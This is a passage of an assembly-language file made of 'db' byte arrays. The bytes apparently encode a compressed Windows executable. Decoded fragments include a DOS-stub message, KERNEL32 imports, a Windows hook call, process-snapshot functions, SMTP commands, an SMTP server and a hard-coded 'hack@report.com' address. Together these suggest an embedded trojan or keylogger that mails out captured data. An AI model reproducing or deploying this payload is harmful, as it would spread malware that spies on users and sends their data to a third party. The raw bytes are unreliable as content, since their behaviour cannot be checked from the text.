6,3,175,6,137,3,198,67,3,32,131,195,4,235,254,151 + db 183,183,17,17,5,116,5,22,2,117,7,171,79,176,32,170 + db 131,198,4,128,2,67,232,23,180,117,207,97,87,83,35,71 + db 203,158,123,195,111,223,235,5,104,122,6,152,188,188,145,222 + db 225,104,133,105,33,223,237,161,9,8,8,111,9,186,13,63 + db 187,15,200,67,34,160,15,116,97,163,247,38,139,240,197,254 + db 28,219,51,255,19,87,135,42,102,139,198,69,176,24,124,220 + db 176,118,37,104,94,86,26,22,253,31,176,110,80,93,86,88 + db 88,3,240,71,131,255,35,117,190,67,129,108,96,178,96,192 + db 112,247,215,11,183,101,135,152,170,20,11,219,185,60,242,220 + db 114,180,253,195,23,179,202,102,118,245,47,92,78,12,233,30 + db 43,224,108,111,103,111,117,113,185,238,194,70,195,248,143,33 + db 49,10,191,6,10,63,205,79,243,235,60,60,50,12,49,60 + db 51,5,38,60,52,141,20,246,52,4,27,85,64,15,110,36 + 
db 99,26,160,251,162,14,110,23,254,96,120,109,115,103,32,117 + db 73,188,231,210,174,172,170,178,185,209,59,170,250,50,192,170 + db 245,19,47,4,118,15,97,179,5,88,201,100,105,114,233,195 + db 49,182,33,240,218,97,188,254,186,185,104,197,201,114,119,63 + db 176,137,133,184,16,141,189,232,5,130,91,110,180,26,10,148 + db 71,120,30,247,47,90,102,251,17,155,116,6,17,114,150,71 + db 182,238,13,101,255,181,220,21,86,76,232,189,104,174,134,125 + db 97,118,20,235,29,33,252,99,102,96,101,30,254,13,41,130 + db 13,140,23,26,40,162,182,143,190,215,65,152,163,182,63,90 + db 18,255,110,124,132,75,170,76,60,82,69,80,174,32,0,74 + db 33,151,203,229,119,21,1,210,131,0,91,167,67,232,131,251 + db 169,97,33,79,215,59,109,34,78,107,45,141,172,67,21,236 + db 156,110,66,235,106,43,176,4,78,155,28,204,40,48,2,200 + db 5,25,6,153,96,233,114,99,100,117,121,217,28,6,156,61 + db 3,90,61,185,112,102,93,126,6,251,248,74,14,24,1,194 + db 26,27,136,99,3,222,66,0,186,27,108,246,69,82,32,81 + db 105,115,116,161,18,242,233,220,102,98,246,17,228,104,128,223 + db 54,11,40,35,167,28,16,117,127,221,238,235,124,4,9,112 + db 38,21,252,15,190,10,139,14,227,102,172,165,220,117,81,66 + db 219,31,73,46,219,30,158,237,100,139,216,43,1,116,56,83 + db 46,0,128,67,198,177,191,131,232,4,120,68,255,54,20,104 + db 245,136,16,241,190,131,140,184,135,185,239,191,56,223,6,34 + db 125,247,83,101,32,129,254,18,15,190,71,59,195,142,120,102 + db 214,17,133,44,28,146,96,54,186,14,138,129,50,72,108,180 + db 135,247,88,46,213,140,253,40,141,9,167,103,115,219,147,180 + db 59,52,10,148,17,23,176,217,40,105,101,150,31,78,121,152 + db 53,12,58,146,173,14,242,116,90,184,255,3,107,105,108,108 + db 117,123,70,185,40,152,161,126,227,75,45,111,215,198,71,254 + db 0,66,45,117,1,70,86,225,5,111,255,78,48,128,126,255 + db 12,2,247,216,204,76,217,207,80,14,46,66,13,106,80,249 + db 132,23,8,221,88,21,24,247,235,22,244,76,221,254,137,99 + db 118,114,116,117,63,70,125,185,232,171,223,153,161,195,130,104 + db 
144,46,86,195,10,108,252,34,51,70,115,114,118,108,23,203 + db 60,135,141,204,74,14,32,255,145,140,29,18,221,57,78,247 + db 57,18,139,132,92,229,129,14,231,2,109,225,129,36,100,115 + db 212,190,11,238,126,154,187,20,14,119,51,50,48,5,190,59 + db 6,102,129,15,247,52,240,214,39,4,63,45,114,251,1,19 + db 13,161,155,99,205,115,2,37,191,3,137,53,34,149,22,217 + db 153,91,5,61,38,100,32,91,214,171,50,179,92,115,148,183 + db 35,49,144,11,230,232,7,48,33,46,69,210,169,103,255,178 + db 159,168,228,162,144,107,196,148,156,40,228,100,34,38,8,217 + db 15,12,102,116,117,112,78,88,172,173,154,198,242,76,81,59 + db 212,107,148,44,82,75,134,12,51,168,137,87,9,175,13,161 + db 22,109,107,13,204,177,35,123,117,83,70,209,106,122,58,128 + db 91,163,41,18,113,102,248,210,115,18,210,171,101,89,191,132 + db 94,53,27,175,206,237,30,79,10,163,173,75,14,177,37,235 + db 245,115,42,126,83,60,176,85,178,46,200,248,104,118,191,219 + db 88,12,12,86,13,244,117,225,32,137,110,28,105,176,175,85 + db 200,115,180,23,0,213,242,75,73,115,114,109,81,211,59,70 + db 100,11,125,80,114,101,110,113,95,210,31,148,140,93,87,102 + db 40,100,101,108,25,33,100,45,79,190,145,152,177,64,57,40 + db 119,228,49,207,22,242,52,82,54,131,10,104,44,255,192,58 + db 161,47,10,8,124,101,120,101,99,117,118,39,140,86,2,79 + db 8,227,4,189,224,160,3,85,232,1,104,9,105,145,93,58 + db 249,92,24,137,108,26,32,118,182,146,11,20,78,111,112,117 + db 209,145,1,9,98,241,177,43,24,130,180,118,15,113,100,20 + db 59,94,167,235,23,104,128,7,25,160,9,134,4,216,170,78 + db 156,98,132,65,134,234,111,207,17,82,13,187,101,83,230,200 + db 211,208,237,61,32,161,107,118,34,121,82,197,104,120,72,92 + db 83,67,25,173,8,240,230,50,226,172,144,86,230,158,136,142 + db 206,16,208,65,22,229,86,217,223,39,113,222,46,64,128,61 + db 11,255,116,18,8,8,179,125,242,254,116,9,239,117,48,72 + db 192,121,26,102,203,11,106,183,84,23,86,177,255,11,235,96 + db 87,139,206,131,225,127,139,62,0,13,187,208,133,25,95,227 + db 
246,187,106,65,189,148,178,128,42,88,117,42,116,11,18,90 + db 20,146,200,107,160,74,89,126,149,16,156,102,112,117,116,56 + db 97,207,80,198,30,52,87,19,117,46,236,115,32,139,223,20 + db 11,12,120,111,185,24,235,211,95,143,1,192,204,93,66,223 + db 198,30,63,136,19,31,94,139,127,109,1,179,46,83,106,21 + db 87,224,21,133,230,110,250,40,18,43,91,163,231,23,138,23 + db 167,225,237,237,51,201,73,91,253,176,92,4,252,71,71,75 + db 55,25,30,74,200,56,105,162,87,32,88,152,145,162,51,18 + db 0,205,182,94,131,80,94,61,205,11,73,244,109,203,70,19 + db 189,147,0,44,205,135,69,178,160,178,119,115,100,137,24,32 + db 164,146,1,13,129,128,96,198,206,50,14,191,58,51,118,217 + db 102,36,34,15,67,32,26,176,148,217,38,132,167,239,227,13 + db 210,139,167,51,187,143,43,83,29,15,249,52,42,1,192,87 + db 117,66,255,50,43,171,133,60,147,115,172,145,45,158,111,79 + db 211,187,172,64,11,132,179,61,28,134,153,128,115,54,195,73 + db 189,104,136,189,239,47,182,132,187,99,133,65,42,73,163,116 + db 31,57,20,137,126,114,22,123,52,42,37,128,59,124,235,190 + db 132,203,26,201,12,197,61,12,102,213,4,25,5,142,104,133 + db 60,156,140,131,45,35,0,112,118,92,8,247,131,165,120,96 + db 65,122,159,121,128,59,125,131,109,3,249,128,39,67,193,91 + db 199,3,80,179,112,86,243,232,24,83,15,244,2,124,15,215 + db 240,13,133,139,123,8,11,140,196,31,141,247,45,70,190,46 + db 12,183,252,3,127,3,116,109,68,73,223,98,105,127,4,83 + db 64,176,4,104,122,175,167,45,38,123,193,142,220,14,130,162 + db 192,222,44,102,10,162,23,151,32,11,179,243,255,133,125,39 + db 124,128,127,101,199,250,136,58,236,27,10,117,60,80,192,145 + db 176,192,79,213,88,85,59,216,101,74,18,241,61,3,25,142 + db 112,153,185,216,133,47,95,238,238,235,81,167,97,169,15,44 + db 105,199,45,237,8,79,89,177,144,16,168,235,93,235,64,104 + db 144,20,74,143,86,178,217,5,62,65,3,46,99,226,25,244 + db 11,245,164,94,3,252,161,58,235,175,254,110,138,24,185,85 + db 139,125,8,120,170,44,94,224,193,127,3,248,79,17,92,117 + db 
250,141,5,96,246,126,103,56,31,117,246,46,123,30,253,251 + db 218,11,167,134,60,56,95,18,87,242,136,139,77,252,60,82 + db 117,181,17,57,145,206,203,104,217,97,146,188,228,6,56,16 + db 108,16,108,253,197,132,240,25,11,5,179,201,194,8,8,67 + db 196,184,51,48,16,102,200,93,194,205,70,173,74,183,180,75 + db 220,5,4,56,249,86,165,11,203,65,0,50,19,81,239,77 + db 118,231,208,17,26,12,35,55,201,27,208,98,106,37,46,195 + db 65,53,13,180,83,76,138,20,19,172,9,24,123,86,221,64 + db 94,125,32,24,19,95,225,62,254,104,41,9,108,4,199,8 + db 33,95,244,255,208,195,225,4,133,87,154,50,47,195,179,11 + db 61,147,128,82,178,18,20,148,79,147,130,21,111,75,30,104 + db 36,162,241,173,0,210,21,185,218,158,218,59,129,169,75,163 + db 166,8,4,239,197,14,228,32,3,42,70,19,148,140,120,118 + db 9,110,96,146,51,180,111,192,88,177,200,249,83,131,101,204 + db 27,121,158,136,45,201,15,90,149,196,229,200,65,32,131,204 + db 137,112,98,217,110,141,29,191,29,200,25,204,80,3,208,3 + db 180,134,183,212,80,34,104,200,209,152,193,243,125,54,5,34 + db 117,252,50,172,140,19,242,144,54,50,93,200,80,129,106,139 + db 44,164,195,138,3,233,51,103,37,59,100,91,147,163,42,67 + db 4,43,176,94,35,43,253,44,2,125,36,110,21,56,195,214 + db 114,117,160,211,131,69,98,88,162,212,155,154,184,104,24,140 + db 91,243,216,8,216,236,131,125,120,36,10,116,56,6,16,83 + db 47,202,121,182,183,116,17,30,248,33,18,248,232,218,97,131 + db 189,3,255,69,216,14,154,89,139,18,182,11,152,202,92,61 + db 79,255,1,20,214,130,57,176,95,32,82,220,124,50,80,50 + db 216,1,97,160,55,146,193,204,1,26,91,166,6,50,193,39 + db 77,90,144,0,116,137,197,136,217,93,211,0,184,0,0,188 + db 249,127,115,145,4,200,14,31,186,14,0,180,9,205,33,184 + db 1,76,219,255,239,96,84,45,32,112,114,111,103,114,97,109 + db 32,99,97,110,110,111,235,98,169,191,109,245,101,32,114,117 + db 46,105,2,68,79,83,32,109,111,212,96,255,193,126,46,13 + db 13,10,36,67,113,212,247,219,53,181,153,136,3,143,220,124 + db 119,38,7,201,149,139,136,52,187,170,138,82,105,99,11,117 + db 
132,189,104,27,139,80,144,76,254,176,75,193,1,5,33,182 + db 61,19,224,0,14,33,11,193,6,27,91,12,220,8,228,16 + db 3,123,179,177,177,32,34,16,11,2,26,0,7,103,110,73 + db 55,12,96,30,52,16,179,240,108,96,7,6,224,49,47,156 + db 38,6,201,194,48,44,60,10,69,194,0,217,72,0,0,48 + db 139,123,167,219,224,46,116,103,116,164,146,144,179,126,223,45 + db 236,4,35,234,96,46,98,115,115,16,112,2,252,203,5,118 + db 123,128,208,46,114,100,97,116,97,192,146,48,185,124,2,59 + db 2,247,102,179,102,64,46,38,106,160,47,207,242,79,217,12 + db 39,192,46,114,101,108,111,99,104,80,194,78,201,32,14,66 + db 0,0,167,192,21,162,91,69,137,83,37,28,19,165,2,9 + db 193,133,175,66,197,112,125,244,117,32,38,94,26,75,174,169 + db 24,116,20,80,45,116,11,152,130,104,195,123,8,42,232,134 + db 20,252,190,40,252,235,30,37,115,24,196,43,241,6,217,27 + db 4,246,70,88,76,188,19,111,54,97,54,36,105,247,7,153 + db 90,230,120,6,41,8,163,51,182,48,19,174,208,183,94,60 + db 144,177,147,181,15,81,41,14,34,12,95,119,44,62,41,2 + db 195,24,12,34,64,100,51,222,102,83,189,18,228,12,192,40 + db 216,247,164,250,185,9,122,13,39,120,171,228,94,86,173,254 + db 16,136,93,87,83,81,86,82,70,205,190,88,124,10,80,78 + db 57,210,205,108,255,11,246,54,183,27,22,228,90,94,89,91 + db 95,62,8,26,48,87,158,188,250,37,32,240,244,135,26,25 + db 73,218,52,3,71,235,248,13,172,253,111,191,255,92,116,7 + db 198,7,92,128,103,27,70,149,58,27,185,110,194,250,64,232 + db 198,20,228,158,144,238,75,133,252,128,189,238,22,115,31,21 + db 187,224,113,247,48,84,29,154,63,123,200,97,103,238,158,252 + db 235,72,66,163,109,16,14,12,66,240,66,3,169,54,153,187 + db 212,192,104,2,108,23,234,66,143,153,47,11,16,255,181,226 + db 15,255,85,12,154,207,135,122,161,41,188,250,40,204,108,94 + db 104,88,86,18,219,8,138,37,32,48,200,200,200,86,5,4 + db 8,12,200,200,200,200,16,20,24,28,200,200,200,200,0,56 + db 40,44,162,176,204,200,48,52,8,166,89,110,47,80,49,3 + db 200,48,218,234,92,211,52,203,2,49,18,44,68,188,19,108 + db 
154,166,251,0,124,23,140,156,176,106,49,203,119,9,131,48 + db 175,92,19,48,164,96,6,51,32,198,231,123,109,49,42,73 + db 12,70,88,187,193,2,91,67,95,115,101,31,11,70,182,183 + db 183,3,114,115,116,4,108,101,65,29,145,78,43,254,103,38 + db 30,16,225,0,71,101,116,67,117,114,187,255,107,254,118,116 + db 68,39,101,99,116,111,114,121,240,23,68,114,105,118,101,84 + db 22,45,154,221,121,112,39,9,1,76,194,112,242,246,118,236 + db 97,108,22,83,116,5,110,103,115,65,62,2,83,116,219,246 + db 4,211,2,108,117,114,46,116,11,220,93,226,255,157,112,23 + db 75,69,82,78,69,76,51,50,43,108,108,222,254,183,189,13 + db 20,0,67,80,108,143,72,111,111,107,69,120,17,219,1,80 + + db 115,223,37,222,186,116,77,101,153,97,103,177,16,95,177,217 + db 221,119,89,15,93,111,87,196,111,119,115,51,43,97,238,183 + db 20,129,2,85,110,104,11,22,144,180,178,97,109,83,106,103 + db 0,136,217,226,33,19,48,50,34,1,217,52,91,107,172,3 + db 24,40,191,16,179,108,154,102,98,246,159,59,50,84,237,232 + db 51,77,98,111,57,2,41,75,98,221,182,67,236,114,105,86 + db 160,97,236,104,65,110,17,225,173,13,12,120,101,100,46,102 + db 73,110,40,208,111,215,213,234,75,66,42,0,82,51,70,206 + db 209,86,149,24,83,15,12,0,136,66,154,181,34,25,232,161 + db 52,132,176,109,42,181,135,81,70,2,32,68,255,127,179,76 + db 16,72,8,48,51,48,79,48,106,48,114,48,119,48,131,48 + db 146,255,255,255,255,48,161,48,181,48,196,48,209,48,123,49 + db 213,49,232,49,237,49,254,49,14,50,64,50,70,50,76,50 + db 82,50,88,50,94,40,146,255,255,50,100,50,106,50,112,50 + db 118,50,124,50,130,50,136,50,142,50,134,224,24,141,202,224 + db 245,127,34,102,15,218,228,249,5,31,9,123,65,62,71,95 + db 228,249,232,249,11,18,220,10,241,9,57,159,104,228,191,35 + db 224,247,201,100,73,158,59,142,18,130,113,2,221,138,182,136 + db 64,202,70,19,138,195,92,35,14,130,51,178,243,179,70,80 + db 84,59,28,104,180,16,203,78,17,236,130,11,121,101,75,246 + db 186,101,16,67,65,82,14,133,73,138,111,114,236,250,38,106 + db 2,44,25,209,176,106,172,127,43,136,28,156,156,232,250,7 + db 
236,123,42,32,207,169,182,106,8,39,171,161,120,167,172,252 + db 177,141,189,11,204,212,222,109,21,134,166,53,172,170,10,192 + db 11,230,59,117,82,92,145,216,121,245,96,195,62,138,81,17 + db 106,63,21,141,1,204,190,20,122,18,207,81,77,177,43,130 + db 31,132,104,248,37,181,151,173,236,123,160,110,226,127,11,76 + db 130,177,98,115,46,13,0,151,2,104,87,76,104,122,64,106 + db 177,139,216,170,210,167,179,71,104,251,104,134,214,189,22,169 + db 70,138,124,0,198,139,223,81,31,6,9,253,139,200,43,71 + db 71,252,87,104,107,75,71,184,167,129,81,136,38,147,156,66 + db 86,197,14,0,24,234,3,189,199,138,33,80,131,189,177,8 + db 228,22,123,50,186,208,131,165,19,26,224,249,151,241,146,28 + db 224,249,10,24,34,162,109,182,65,85,6,74,183,163,190,7 + db 185,53,235,176,75,97,4,163,236,15,89,158,75,158,75,240 + db 102,244,115,226,100,159,75,248,176,97,90,116,34,203,158,203 + db 150,79,182,31,252,196,15,210,41,54,16,17,88,252,128,36 + db 145,162,20,229,244,251,106,62,208,191,32,208,54,219,67,155 + db 32,57,5,16,227,253,104,43,128,16,145,213,131,61,12,5 + db 118,93,192,123,30,141,141,51,148,42,23,104,144,226,61,25 + db 228,21,35,124,88,163,38,7,189,243,172,44,252,253,17,218 + db 176,3,61,160,74,208,27,97,144,25,123,104,121,96,11,251 + db 209,176,201,102,188,14,42,106,80,35,120,128,11,88,104,17 + db 123,107,179,243,233,114,38,250,251,20,15,207,200,30,146,61 + db 58,98,65,216,250,66,255,172,250,66,2,86,81,139,240,156 + db 138,4,49,60,65,114,237,255,111,255,9,60,90,119,5,4 + db 32,136,12,73,121,237,139,198,89,94,195,81,51,201,65,128 + db 60,35,213,64,76,248,117,249,139,193,89,51,244,51,216,126 + db 11,90,114,39,32,117,1,64,129,6,230,238,182,59,103,9 + db 9,16,13,117,3,26,65,8,8,117,25,183,37,75,212,115 + db 64,255,25,254,13,219,109,224,218,106,107,12,30,146,7,5 + db 57,119,52,21,57,25,27,65,12,90,96,76,183,25,43,5 + db 88,186,114,10,8,192,100,146,67,206,18,219,228,233,82,171 + db 62,57,245,73,116,28,219,210,184,127,191,205,47,254,5,113 + db 128,61,5,70,15,130,28,18,97,211,217,48,31,229,120,70 
+ db 103,107,191,44,137,222,9,128,37,40,247,106,166,194,4,42 + db 55,58,182,89,145,131,117,190,90,211,237,88,183,63,19,61 + db 96,234,5,118,31,80,80,195,10,11,186,44,96,234,10,82 + db 92,146,128,230,227,91,89,159,83,209,96,63,9,56,91,65 + db 83,104,123,159,139,85,170,247,123,64,187,15,3,29,27,123 + db 109,28,227,187,125,202,96,200,202,134,29,199,180,127,33,91 + db 38,202,78,163,35,125,118,68,239,247,178,141,181,11,129,61 + db 52,188,114,45,22,116,136,206,80,143,217,83,19,50,200,229 + db 123,159,71,107,219,88,220,162,135,16,71,64,241,100,187,156 + db 102,187,219,0,122,157,76,11,193,227,8,8,72,156,179,145 + db 27,106,68,241,72,6,76,111,3,157,13,69,60,114,53,139 + db 141,33,190,12,78,150,73,84,0,67,149,231,242,239,15,209 + db 14,148,2,28,71,54,138,156,40,27,240,38,219,255,136,92 + db 16,4,64,10,219,117,239,82,50,64,38,173,251,174,207,166 + db 86,120,44,73,90,141,130,9,51,80,6,50,114,228,200,8 + db 3,7,2,134,1,5,46,249,92,58,66,4,80,107,107,0 + db 248,32,71,162,96,204,14,232,120,81,82,130,255,55,254,83 + db 139,117,12,139,69,8,196,138,20,1,10,210,117,10,145,91 + db 90,89,223,104,27,239,251,235,44,128,250,142,18,4,141,13 + db 128,234,65,203,203,219,255,179,25,42,218,178,65,2,211,235 + db 21,22,97,114,16,122,119,11,97,214,254,47,35,97,134,20 + db 49,65,235,189,255,37,112,81,117,5,200,200,200,200,92,88 + db 84,80,200,200,200,200,76,72,68,64,200,200,200,200,108,56 + db 52,48,200,200,200,200,44,40,36,32,216,200,200,200,28,60 + db 96,100,119,35,35,223,201,104,80,5,92,96,100,35,35,35 + db 35,104,108,112,116,35,35,35,35,120,124,128,132,35,35,35 + db 35,136,140,144,148,35,35,35,35,152,156,160,164,35,35,35 + db 35,168,172,176,180,35,35,35,35,184,188,192,196,35,35,35 + db 35,200,204,208,212,35,35,35,35,216,220,224,228,35,35,35 + db 35,232,236,64,244,35,35,35,35,248,252,240,84,35,35,35 + db 35,80,76,72,68,35,35,35,35,28,56,52,48,35,35,35 + db 35,44,40,36,32,35,35,35,35,0,24,20,16,35,35,35 + db 35,12,8,4,160,70,70,70,158,81,156,152,148,144,70,70 + db 
70,70,140,120,124,128,93,97,70,70,132,136,238,87,253,119 + db 52,74,14,145,142,51,210,138,6,70,60,2,117,18,23,110 + db 251,191,6,247,210,70,235,11,44,48,141,12,137,2,72,21 + db 118,99,238,21,127,241,141,4,17,51,194,95,237,143,65,20 + db 35,35,35,99,5,8,4,168,176,35,35,35,35,180,184,188 + db 192,35,35,35,35,196,200,204,208,35,35,35,35,212,216,220 + db 224,141,40,178,42,6,146,64,64,149,2,127,249,143,160,84 + db 83,95,115,101,114,118,0,97,98,101,102,104,86,48,57,9 + db 246,154,2,61,165,104,41,8,51,103,131,84,180,223,109,39 + db 83,45,105,99,101,80,114,111,4,190,123,114,187,204,13,10 + db 1,45,45,32,83,17,105,111,110,32,84,246,134,253,223,35 + db 109,105,110,233,101,44,32,37,115,32,29,41,14,96,109,236 + db 189,18,3,56,42,0,14,219,23,246,220,32,10,17,79,78 + db 111,117,153,108,255,15,44,217,108,101,88,75,115,109,116,112 + db 46,119,97,110,97,100,255,255,127,251,111,111,46,102,114,224 + db 104,97,99,107,64,114,101,112,111,114,116,46,99,111,109,0 + db 115,97,100,100,97,109,55,160,111,229,46,104,117,140,55,64 + db 99,97,14,97,105,255,251,239,177,108,27,45,42,61,1,60 + db 32,82,97,112,48,32,73,80,32,62,61,97,219,186,103,20 + db 45,0,97,33,17,112,152,85,27,110,119,119,155,96,109,200 + db 68,97,116,5,72,101,117,96,32,33,91,1,131,197,129,199 + db 46,112,0,33,43,120,5,137,112,43,43,120,5,99,125,35 + db 27,97,5,177,0,238,2,177,109,36,83,188,116,96,110,80 + db 32,65,248,183,119,53,103,101,0,112,213,112,105,0,69,110 + db 117,109,129,175,125,131,112,55,41,77,111,100,117,31,89,152 + db 193,64,184,78,174,162,83,0,13,191,181,15,60,37,100,32 + db 46,194,116,40,115,41,62,102,83,237,25,196,134,121,203,109 + db 92,70,67,111,3,131,176,64,108,77,108,231,92,222,115,157 + db 69,184,189,92,191,34,65,99,229,12,32,11,134,6,209,39 + db 110,111,137,108,116,222,218,237,11,125,58,47,47,119,0,46 + db 109,47,60,115,111,102,119,134,141,19,117,72,45,79,23,99 + db 77,65,73,26,196,235,254,76,32,70,82,79,77,58,126,115 + db 117,145,108,219,100,23,105,116,111,15,70,55,109,12,34,247 + db 
207,13,182,34,17,84,27,59,83,117,98,106,104,64,83,96 + db 51,12,40,0,115,99,188,115,13,6,113,117,105,116,74,46 + db 5,0,98,99,195,13,51,5,121,73,116,238,172,253,37,69 + db 32,118,55,46,48,32,52,221,32,182,208,248,111,133,112,56 + db 223,100,46,32,91,39,63,39,32,16,113,91,130,190,22,32 + db 97,102,102,236,101,8,108,39,89,251,96,188,52,100,101,93 + db 157,36,73,78,70,223,0,176,49,200,187,13,77,83,71,32 + db 34,245,120,55,18,113,193,35,135,32,109,59,34,31,214,188 + db 57,123,68,73,82,33,6,87,76,73,83,84,87,67,83,59 + db 228,221,76,59,67,86,82,84,67,105,49,154,169,235,54,107 + db 111,156,97,144,110,145,169,117,103,173,208,124,156,12,26,99 + db 148,116,46,128,193,254,82,83,82,86,76,54,91,235,215,209 + db 74,75,20,87,158,4,121,93,16,135,157,117,55,50,45,115 + db 12,93,40,83,95,78,57,59,225,107,226,153,115,221,34,29 + db 75,133,43,100,34,68,75,216,55,236,251,97,130,34,80,73 + db 68,18,67,46,18,59,214,186,13,45,112,189,111,190,44,77 + db 75,253,167,144,19,152,25,82,77,69,78,40,67,195,100,77 + db 70,134,105,135,215,219,48,53,201,95,168,34,145,23,37,255 + db 102,91,97,146,102,26,127,70,73,78,68,107,148,219,118,32 + db 2,102,182,101,110,253,46,132,133,195,118,42,65,182,34,107 + db 208,110,157,55,155,178,198,171,102,100,101,30,61,97,32,249 + db 69,88,69,67,72,205,79,80,150,126,11,236,172,37,117,34 + db 42,16,71,165,135,176,199,162,80,85,84,40,32,40,70,190 + db 203,66,119,227,108,32,80,191,104,41,161,110,113,46,46,11 + db 86,231,58,112,16,117,135,10,251,183,181,177,112,97,92,119 + db 177,100,81,65,87,69,66,6,240,67,254,241,69,77,79,87 + db 83,68,76,85,114,108,47,97,101,29,131,29,46,150,34,154 + db 228,206,16,13,249,75,69,89,192,94,194,210,108,183,91,1 + db 48,93,3,49,42,93,216,187,91,70,35,193,239,202,79,70 + db 70,50,109,187,21,56,49,60,126,79,79,211,50,184,109,91 + db 250,182,79,137,82,24,51,96,72,229,68,14,195,9,179,11 + db 18,52,32,44,73,73,42,109,105,107,39,141,200,236,99,167 + db 117,134,29,0,205,192,111,32,184,143,79,0,212,84,12,96 + db 
23,99,80,100,117,166,82,193,113,205,207,156,154,36,22,182 + db 55,45,228,93,17,118,111,121,101,14,97,26,99,107,144,158 + db 54,147,117,193,46,155,69,204,173,125,166,147,185,178,37,105 + db 72,38,10,89,194,182,108,13,114,64,44,14,139,85,218,4 + db 102,108,210,96,110,76,206,84,234,10,118,77,243,94,254,0 + db 23,129,214,95,7,45,8,194,194,217,37,179,57,120,65,67 + db 163,109,71,131,215,172,185,36,18,45,108,187,104,232,58,16 + db 38,101,117,108,63,131,7,219,86,216,206,47,82,41,185,223 + db 221,181,10,3,38,162,79,87,101,98,54,97,111,169,4,85 + db 115,12,34,76,87,182,118,7,198,102,247,101,203,106,97,159 + db 76,6,214,40,208,217,108,1,90,246,234,224,194,205,116,225 + db 108,133,63,60,216,26,72,217,112,164,109,229,113,107,237,51 + db 247,166,85,157,176,67,122,32,104,39,196,154,146,238,50,121 + db 47,118,26,70,74,31,56,111,67,109,173,64,181,243,75,220 + db 101,114,172,64,181,35,82,117,110,29,75,83,224,202,67,8 + db 24,101,203,185,88,99,39,203,58,23,91,96,240,91,248,92 + db 161,26,166,86,0,124,11,124,7,54,193,65,225,67,191,226 + db 200,32,201,224,19,24,138,42,46,42,227,2,6,9,123,7 + db 0,237,51,95,55,232,42,73,137,71,69,172,32,60,163,115 + db 13,221,47,60,109,62,39,30,37,101,248,184,27,227,0,135 + db 62,9,66,89,69,168,16,193,5,193,61,50,71,70,73,73 + db 137,194,217,214,119,233,83,84,133,238,64,18,94,87,91,116 + db 155,170,112,48,185,152,166,24,183,135,131,137,66,169,14,174 + db 24,97,3,40,24,160,71,46,32,220,245,9,17,78,246,69 + db 10,78,84,241,4,19,90,132,134,51,117,73,54,125,214,76 + db 1,107,170,26,246,47,25,235,28,179,7,79,83,8,47,238 + db 117,165,23,115,152,222,41,227,242,12,42,109,173,49,178,33 + db 112,182,30,108,16,152,193,236,10,27,125,228,44,101,141,222 + db 94,22,26,228,9,5,115,49,239,27,13,152,57,22,168,88 + db 97,113,18,231,46,227,18,122,115,115,115,28,226,22,75,194 + db 132,175,219,48,251,251,94,204,34,116,186,71,68,189,225,98 + db 111,97,112,237,121,13,53,18,182,138,174,100,150,204,101,43 + db 83,135,197,173,183,87,84,87,65,126,92,77,123,92,59,44 + db 
102,64,138,210,86,48,172,209,226,81,49,198,161,45,22,130 + db 111,3,19,67,77,0,28,123,31,105,154,166,233,3,37,43 + db 48,52,58,81,104,71,166,62,245,103,117,167,214,106,100,162 + db 30,130,90,162,215,116,43,108,232,112,0,117,0,119,130,17 + db 0,109,70,47,90,51,5,166,94,36,79,140,204,32,92,70 + db 37,76,81,140,209,123,4,81,204,89,80,122,232,33,8,194 + db 170,99,82,120,193,200,241,248,126,105,37,224,94,132,8,134 + db 76,129,148,5,90,218,66,133,246,80,104,36,34,247,98,37 + db 115,212,68,16,154,242,98,243,19,216,178,71,3,176,50,104 + db 204,65,227,108,13,68,70,248,11,18,224,117,214,132,42,115 + db 233,64,33,132,160,231,0,170,146,21,2,168,64,134,0,5 + db 80,129,132,10,160,2,25,20,64,5,50,40,128,10,100,81 + db 0,21,200,163,0,42,144,70,1,84,32,153,0,8,194,3 + db 252,40,0,208,178,64,64,1,252,0,208,37,170,242,111,114 + db 176,130,168,109,73,101,13,62,239,30,246,217,9,109,112,105 + db 10,97,116,9,87,114,105,116,138,237,1,64,109,10,86,17 + db 185,239,160,76,97,108,70,114,101,12,43,84,197,3,5,72 + db 22,25,182,214,189,246,67,111,64,35,47,67,29,55,101,130 + db 45,43,136,173,17,63,89,119,194,30,84,104,6,100,13,111 + db 111,108,104,101,100,219,246,255,108,112,51,50,83,110,97,112 + db 115,104,111,116,25,68,15,101,52,155,4,64,237,69,120,131 + db 3,12,4,34,26,54,63,142,46,4,34,154,1,141,1,191 + db 9,129,136,139,1,180,76,105,170,162,109,237,98,114,97,146 + db 12,71,90,209,236,109,19,211,18,110,29,16,7,170,40,81 + db 81,82,43,129,136,102,17,120,123,221,178,101,21,142,18,68 + db 222,32,8,68,20,97,109,47,219,120,236,223,75,14,129,83 + db 105,122,101,12,76,97,115,8,129,136,78,124,0,245,54,146 + db 0,232,1,228,19,255,102,19,6,114,17,132,65,100,100,114 + db 21,133,194,97,136,83,58,161,194,190,204,85,89,52,84,105 + db 109,155,21,38,81,69,44,68,216,36,170,152,14,74,227,222 + db 132,66,27,147,89,41,13,201,182,67,216,116,118,133,79,208 + db 110,246,176,8,133,96,8,178,115,15,51,202,237,16,115,68 + db 82,101,52,3,139,16,64,28,96,220,30,9,132,83,90,148 + db 
139,79,102,21,2,40,97,106,53,162,138,95,172,86,27,22 + db 80,111,0,106,55,119,56,15,11,101,112,6,70,48,67,140 + db 123,124,124,227,68,21,179,231,9,1,0,171,98,251,218,182 + db 247,97,29,103,36,93,116,206,116,235,190,179,168,89,65,148 + db 103,83,86,96,172,181,239,112,117,101,9,15,81,10,135,17 + db 35,217,103,36,156,75,101,121,16,105,23,150,205,220,15,94 + db 77,130,106,117,16,64,55,10,3,197,107,101,16,75,8,147 + db 189,115,47,27,66,44,201,237,90,35,117,112,109,135,16,64 + db 201,120,85,115,121,143,130,27,204,240,91,115,182,6,18,160 + db 83,176,73,14,22,111,216,91,118,8,197,15,153,13,90,179 + db 48,35,32,11,22,4,58,69,21,174,225,185,114,97,20,64 + db 91,225,98,112,114,80,4,208,115,207,28,83,23,107,79,179 + db 181,36,233,20,53,35,16,83,202,214,109,143,72,80,194,99 + db 50,70,106,100,86,104,58,60,88,74,170,108,18,24,40,210 + db 117,166,45,40,47,102,28,84,21,179,2,53,120,17,209,225 + db 199,50,108,220,44,34,90,86,105,112,166,107,63,222,193,8 + db 66,111,29,103,73,99,117,10,104,31,118,4,18,115,111,170 + db 75,105,94,198,66,192,248,181,114,160,233,120,191,44,155,49 + db 108,75,48,38,205,218,66,115,226,126,17,117,44,48,189,130 + db 240,38,170,137,85,14,224,102,193,154,26,79,12,168,98,51 + db 4,155,113,14,105,196,112,22,150,25,170,244,104,123,102,102 + db 